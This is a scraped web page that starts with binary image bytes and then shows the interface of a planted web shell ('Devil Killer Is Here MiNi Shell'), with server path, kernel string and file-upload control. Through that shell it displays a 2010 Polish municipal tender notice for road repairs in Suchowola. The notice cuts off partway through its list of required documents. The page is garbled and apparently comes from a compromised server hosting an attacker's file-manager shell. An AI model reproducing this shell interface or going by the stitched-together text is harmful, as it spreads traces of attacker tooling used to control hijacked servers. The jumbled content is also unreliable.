JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100909/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100909/245873-N-2010.html

<p class="kh_header"><b>Suchowola: Remont ulicy 3-go Maja i ulicy Rzemieślniczej w Suchowoli</b><br>
<b>Numer ogłoszenia: 245873 - 2010; data zamieszczenia: 09.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Suchowola , pl. Kościuszki 5, 16-150 Suchowola, woj. podlaskie, tel. (085) 7229400, faks (085) 7229419.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.suchowola.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ulicy 3-go Maja i ulicy Rzemieślniczej w Suchowoli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie obejmuje n/w zakres:

Część 1 - Remont ulicy 3-go Maja w Suchowoli

- Roboty pomiarowe przy liniowych robotach ziemnych w terenie równinnym - 0,2814km
- Mech. rozebranie nawierzchni z masy min. bitumicznej grubości 4cm. wraz z transportem gruzu na odl. do 1 km - 3,5m2,
- Ręczne rozebranie krawężnika 15x30 na ul.3-go Maja - 18,2m,
- Ręczne rozebranie nawierzchni z kostki brukowej bet. - 55,7m2,
- Mechaniczne rozebranie nawierzchni z bet. Gr.15cm z odwiezieniem materiałów na odległość 1km - 2,2m2,
- Roboty ziemne wykonane koparkami podsiębiernymi w gruncie kat. III i IV z transportem Urobku na odkład na odl. do1km.w/g tabeli robót ziemnych 1178,78m3,
- Wykonanie nasypów mechanicznie w gruncie kat. III w/g tabeli robót ziemnych-10,76m3,
- Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni wykonane w gr. kat. II-IV -obmiar jak warstwy nawierzchni,
- Wykonanie koryta ręcznie na szerokości chodników głębokości 10cm.- 53,76m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. gr. 15 cm wraz z transportem i zagęszczeniem w lokalizacji na wjazdach zgodnie z wykazem wjazdów -116,8m2,
- Wykonanie i zagęszczenie warstwy piasku w korycie gr. 15cm w lokalizacji na ulicy 3-go Maja 1703,6m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. w. dolna gr. 20 cm wraz z transportem i zagęszczeniem w lokalizacji na ul. 3-go Maja 1703,6m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. w. górna gr. 10 cm wraz z transportem i zagęszczeniem w lokalizacji na ul. 3-go Maja 1703,6m2,
- Mechaniczne oczyszczenie warstw konstrukcyjnych nieulepszonych - na ul. 3-go Maja 1703,6m2,
- Skropienie mechaniczne warstw konstrukcyjnych emulsją asfaltową - na ul. 3-go Maja 1703,6m2,
- Wykonanie warstwy wiążącej gr. 4 cm z miesz. min.-asf. z transportem z odl. 15km. - na ul. 3-go Maja 1703,6m2,
- Wykonanie warstwy ścieralnej gr. 4 cm z miesz. min.-asf. z transportem z odl. 15km. - na ul. 3-go Maja 1703,6m2,
- Regulacja pionowa studzienek dla urządzeń podziemnych, zawory wodociągowe szt.4,
- Regulacja pionowa studzienek dla urządzeń podziemnych, studnie kanalizacyjne na ul. 3-go Maja- szt.6.
- Chodniki z płyt betonowych o wymiarach 35x35x5 cm na
posypce piaskowej, spoiny wypełnione piaskiem
Na ulicy 3-go Maja 410,18m2,
- Ustawienie krawężników betonowych 15x30 na ławie z oporem z betonu B-15 z wypełnieniem spoin zaprawą cementową - na ul.3-go Maja str. lewa 622,m
- Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową - Str. lewa 278,7m + str. prawa 12,6m RAZEM : 291,3m,
- Place z kostki brukowej betonowej kolorowej grubości 8 cm na podsypce cem. - piaskowej z wypełnieniem spoin piaskiem na wjazdach wg wykazu wjazdów -116 8m2 + na parkingu
56,7m2+ 3,2m2+88,4m2=148,3m2 RAZEM : 265,1m2, 
- Ustawienie obrzeży betonowych 8x30 na podsypce cem.- piask. z wypełnieniem spoin zaprawą cementową na wjazdach wg wykazu wjazdów -67,5mb,
- Ustawienie słupków z rur stalowych o60mm długości 3,80m dla znaków drogowych z wykonaniem i zasypaniem dołów,
- Przymocowanie do gotowych słupków znaków informacyjnych i miejscowości typu B wielkości średniej z folii II generacji na ul.3-go Maja B-20 -szt.1, 
- Przymocowanie do gotowych słupków znaków informacyjnych i miejscowości typu D wielkości średniej z folii I generacji na ul.3-go Maja D-18 -szt.1, 
- Wykonanie trawników dywanowych siewem z uprzednim humusowaniem torfem ogrodniczym warstwą gr 2 cm na ul.3- go Maja  119,7m2

Część 2 - Remont ulicy Rzemieślniczej w Suchowoli

- Roboty pomiarowe przy liniowych robotach ziemnych w terenie równinnym 0,1462km,
- Mech. rozebranie nawierzchni z masy min. bitumicznej grubości 4cm. wraz z transportem gruzu na odl. do 1 km. Na początku trasy po przekopach kanalizacyjnych - 32,5m2, 
- Rozebranie obrzeży betonowych 6X20 z transportem gruzu
na odl. do 1 km - 5,0m,
- Ręczne rozebranie nawierzchni z kostki brukowej bet. 1,4m2,
- Roboty ziemne wykonane koparkami podsiębiernymi w gruncie kat. III i IV z transportem urobku na odkład na odl. do 1km.w/g tabeli robót ziemnych-516,8m3,
- Wykonanie nasypów mechanicznie w gruncie kat. III w/g tabeli robót ziemnych-2,40m3,
- Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni wykonane w gr. kat. II-IV -obmiar jak warstwy nawierzchni,
- Wykonanie koryta ręcznie na szerokości chodników głębokości 10cm.- 84,1m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. gr. 15 cm wraz z transportem i zagęszczeniem w lokalizacji na wjazdach zgodnie z wykazem wjazdów -71,6m2,
- Wykonanie i zagęszczenie warstwy piasku w korycie gr. 15cm w lokalizacji na ulicy Rzemieślniczej 825,8m2 + na chodniku wzmocnionym 42,0m2 = 867,8m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. w. dolna gr. 20 cm wraz z transportem i zagęszczeniem w lokalizacji na ul. Rzemieślniczej 825,8m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. w. górna gr. 10 cm wraz z transportem i zagęszczeniem w lokalizacji na ul. Rzemieślniczej 825,8m2 + na chodniku wzmocnionym 42,0m2 = 867,8m2,
- Mechaniczne oczyszczenie warstw konstrukcyjnych nieulepszonych - 164,2x5,6 + wlot z drogi bocznej 7,1m2 odcinek po przekopach kanalizacyjnych 56,5m2 = 882,32m2,
- Skropienie mechaniczne warstw konstrukcyjnych emulsją asfaltową - 164,2x5,6 + wlot z drogi bocznej 7,1m2 odcinek po przekopach kanalizacyjnych 56,5m2 = 882,32m2,
- Wykonanie warstwy wiążącej gr. 4 cm z miesz. min.-asf. z transportem z odl. 15km. - 164,2x5,6 + wlot z drogi bocznej 7,1m2 odcinek po przekopach kanalizacyjnych 56,5m2 = 882,32m2,
- Wykonanie warstwy ścieralnej gr. 4 cm z miesz. min.-asf. z transportem z odl. 15km. - 164,2x5,6 + wlot z drogi bocznej 7,1m2 odcinek po przekopach kanalizacyjnych 56,5m2 = 882,32m2,
- Regulacja pionowa studzienek dla urządzeń podziemnych, zawory wodociągowe szt.2
- Wykonanie nawierzchni żwirowej - grubość warstwy po zagęszczeniu 15cm. na zjeździe po stronie prawej - 13,8m2,
- Chodniki z płyt betonowych o wymiarach 35x35x5 cm na posypce piaskowej, spoiny wypełnione piaskiem str. lewa 84,5m2,
- Ustawienie krawężników betonowych 15x30 na ławie z oporem z betonu B-15 z wypełnieniem spoin zaprawą cementową-151m,
- Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową - 82,05m,
-Place z kostki brukowej betonowej kolorowej grubości 8 cm na podsypce cem. - piaskowej z wypełnieniem spoin piaskiem na wjazdach wg wykazu wjazdów - 29,6m2 + na chodniku
wzmocnionym 40,0x1,05= 42,0m2 RAZEM : 71,6m2,
-  Ustawienie obrzeży betonowych 8x30 na podsypce cem-piask. z wypełnieniem spoin zaprawą cementową na wjazdach wg wykazu wjazdów 20,9m + 42,0mb RAZEM: 63mb,
- Ustawienie słupków z rur stalowych o60mm dla znaków drogowych z wykonaniem i zasypaniem dołów - 4 szt.,
- Przymocowanie do gotowych słupków znaków informacyjnych i miejscowości typu D wielkości średniej z folii I generacji na ul. Rzemieślniczej D-42 -szt.1, D-43 -szt.1, E-17a -szt.1, E-18a - szt.1 RAZEM : szt.4,
- Wykonanie trawników dywanowych siewem z uprzednim humusowaniem torfem ogrodniczym warstwą gr 2 cm na ul. Rzemieślniczej 6,8m2+ 11,2m2= 18,0m2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.20-6, 45.10.00.00-8, 45.11.27.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości: 
Dla części 1 - 10 000,00 (dziesięć tysięcy zł) na część 1,
Dla części 2 -    5 000,oo (pięć tysiące zł) na część 2.
Uwaga - w przypadku składania oferty na obie części zamówienia trzeba wnieść wadium oddzielnie na każdą część.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia, w ofercie powinien wykazać (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, spełnienie poniższych warunków Wykonawcy wykazują łącznie):
a)  Zakres działalności powinien zapewnić należyte wykonanie zadania.
b) Dysponować pracownikami nadzoru posiadającymi uprawnienia niezbędne do wykonywania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 Prawo budowlane oraz należącymi do właściwej Okręgowej Izby Inżynierów Budownictwa.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia,  że  Wykonawca  posiada  niezbędną  wiedzę  i  doświadczenie  do wykonania niniejszego zamówienia, Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców  o  udzielenie  niniejszego  zamówienia,  oceniany  będzie  ich  łączny  potencjał  techniczny  i kadrowy oraz łączne kwalifikacje i doświadczenie):
a) Wskaże, że w okresie ostatnich 5 (pięciu) lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował (zakończył) jako Wykonawca lub Podwykonawca, co najmniej jedno zadanie lub kilka zadań łącznie, polegających  na  budowie, odbudowie  lub  przebudowie  dróg o wartości nie mniejszej niż: 
               - 500 000,00 PLN netto (słownie: pięćset tysięcy zł) dla części 1 zamówienia;
              - 200 00,00 PLN netto (słownie: dwieście tysięcy zł) dla części 2 zamówienia;
Uwaga - w przypadku składania oferty na obie części zamówienia trzeba spełnić oba warunki.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia,  że  Wykonawca  dysponuje potencjałem technicznym do wykonania niniejszego zamówienia, Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców  o  udzielenie  niniejszego  zamówienia,  oceniany  będzie  ich  łączny  potencjał  techniczny  i kadrowy oraz łączne kwalifikacje i doświadczenie):
a) Dysponować następującymi narzędziami i urządzeniami:
Wytwórnia  (otaczarka)  o  mieszaniu  cyklicznym  lub  ciągłym  do  wytwarzania  mieszanek  mineralno asfaltowych, spycharka uniwersalna, koparka samobieżna min.0.25 m3, układarka mieszanki mineralno asfaltowej, walec gładki wibracyjny/statyczny, samochód samowyładowczy powyżej 5t, samochód skrzyniowy powyżej 5t. 
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia,  że  Wykonawca  dysponuje osobami zdolnymi do wykonania niniejszego zamówienia, Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców  o  udzielenie  niniejszego  zamówienia,  oceniane  będą  ich  łączne kwalifikacje):
a) Wskaże do [wykonania / uczestniczenia w wykonaniu] niniejszego zamówienia następujące [osoby / podmioty], właściwe do realizacji określonych czynności, które posiadają określone kwalifikacje, niezbędne do wykonania zamówienia:
- kierownika budowy (pkt. 8.2.b), z uprawnieniami budowlanymi do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej,
- obsługę geodezyjną - geodetę z uprawnieniami zgodnie z ustawą z dnia 17 maja 1989 Dz. U. 2005 Nr 240 poz. 2027.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia  znajdowania  się  przez  Wykonawcę  w  sytuacji  ekonomicznej  i  finansowej zapewniającej wykonanie zamówienia Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa):
a) posiadać środki finansowe lub zdolność kredytową, z uwzględnieniem potrącenia na inne zobowiązania umowne w wysokości, co najmniej: 
500 000,00 PLN brutto (słownie: pięćset tysięcy zł) dla części 1 zamówienia;
200 00,00 PLN brutto (słownie: dwieście tysięcy zł) dla części 2 zamówienia;
Uwaga - w przypadku składania oferty na obie części zamówienia trzeba spełnić oba warunki.
b)  posiadać	ubezpieczenie	od	odpowiedzialności	cywilnej	w	zakresie	prowadzonej działalności gospodarczej w  wysokości, co najmniej:
500 000,00 PLN brutto (słownie: pięćset tysięcy zł) dla części 1 zamówienia;
500 00,00 PLN brutto (słownie: pięćset tysięcy zł) dla części 2 zamówienia;
Uwaga - w przypadku składania oferty na obie części zamówienia trzeba spełnić oba warunki.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Oświadczenie w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy, oraz w art. 24 ust. 1 pkt 9 Ustawy (wypełnia się, jeżeli dotyczy); (Załącznik. nr 4 do IDW) - wspólny dla części 1 i 2
b)	dowód wniesienia wadium jako potwierdzenie, że Wykonawca przystępujący do przetargu wywiązał się z obowiązku wniesienia wadium;
 c)	parafowany formularz umowy - dokument ten powinien zostać parafowany przez osobę upoważnioną do występowania w imieniu Wykonawcy bądź też, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przez ustanowionego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia;
d)	parafowany formularz wzoru karty gwarancyjnej (Załącznik nr 8 do IDW) - dokument ten powinien zostać parafowany przez osobę upoważnioną do występowania w imieniu Wykonawcy bądź też, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przez ustanowionego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia- wspólny dla części 1 i 2;
e)	kosztorysy ofertowe opracowany zgodnie z przedmiarami robót (oddzielnie dla części 1 i części 2);
